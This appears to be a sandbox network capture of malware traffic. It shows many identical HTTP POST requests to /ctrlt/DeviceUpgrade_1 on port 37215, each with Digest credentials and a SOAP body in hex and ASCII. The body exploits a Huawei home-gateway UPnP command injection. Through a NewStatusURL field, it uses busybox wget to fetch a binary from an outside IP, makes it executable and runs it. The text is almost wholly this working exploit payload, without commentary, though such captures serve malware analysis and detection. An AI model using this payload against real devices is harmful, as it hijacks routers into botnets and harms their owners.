                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.874094009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.218113899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      14192.168.2.1455106156.9.90.2137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.621129990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.138111115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.746144056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.962126970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.586003065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.449882984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.177371979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376657009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:21.286957979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
